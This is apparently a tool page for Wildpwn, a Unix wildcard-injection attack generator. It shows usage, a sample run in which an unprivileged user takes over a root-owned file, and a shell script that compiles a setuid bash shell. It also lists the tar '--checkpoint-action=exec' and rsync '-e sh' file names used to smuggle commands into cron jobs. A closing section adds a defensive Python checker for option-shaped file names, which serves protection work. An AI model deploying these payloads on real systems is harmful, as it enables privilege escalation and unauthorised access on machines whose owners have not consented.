Wildpwn – Unix Wildcard Attack Tool

Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It is considered a fairly old-school attack vector, but it still works quite often.
https://www.exploit-db.com/papers/33930/

Basic usage
It goes something like this:

usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

Payload types

  • combined: Uses the chown & chmod file reference tricks, described in sections 4.1 and 4.2, combined in a single payload.
  • tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
  • rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.

Usage example

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid * (or) chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (as an example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

Bash scripts used on tar/rsync attacks

#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <unistd.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

Clean up (tar)

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Clean up (rsync)

# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c
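
A defensive check for the file names listed in the clean-up sections above, added here as an example (it is not part of Wildpwn or of the original page): it flags directory entries that a bare * would hand to chown, chmod, tar or rsync as options, and builds an argument list that cannot be misparsed. The function names, the constructed sample directory and the --reference pattern are assumptions of this example.

```python
import os
import re
import tempfile

# Option-shaped names for the tools named on this page. --reference is the
# chown/chmod option assumed to be behind the "file reference" trick.
SUSPICIOUS = [
    (re.compile(r"^--reference="), "chown/chmod --reference"),
    (re.compile(r"^--checkpoint(=|-action=)"), "tar --checkpoint/--checkpoint-action"),
    (re.compile(r"^-e(\s|$)"), "rsync -e"),
]

def audit_directory(directory):
    """Return (name, reason) for entries a bare `*` would pass as options."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.startswith("-"):
            continue
        reason = "generic option-like name"
        for pattern, label in SUSPICIOUS:
            if pattern.search(name):
                reason = label
                break
        findings.append((name, reason))
    return findings

def safe_argv(command, directory):
    """Build an argv where no file name can be parsed as an option: `--` ends
    option parsing and each operand gets `./` (dotfiles skipped, like `*`)."""
    names = sorted(n for n in os.listdir(directory) if not n.startswith("."))
    return list(command) + ["--"] + ["./" + n for n in names]

def demo():
    # Constructed sample directory; names mirror those in the clean-up sections.
    with tempfile.TemporaryDirectory() as d:
        for name in ("secret_file_1", "--checkpoint=1",
                     "--checkpoint-action=exec=sh .webscript",
                     "-e sh .syncscript", "--reference=.x", ".webscript"):
            open(os.path.join(d, name), "w").close()
        return audit_directory(d), safe_argv(["chmod", "000"], d)

if __name__ == "__main__":
    findings, argv = demo()
    for name, reason in findings:
        print(f"{name!r}: {reason}")
    print(argv)
```

In a cron job or maintenance script the same effect comes from writing ./* instead of *, or placing -- before the glob.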

Published by Marshmallow
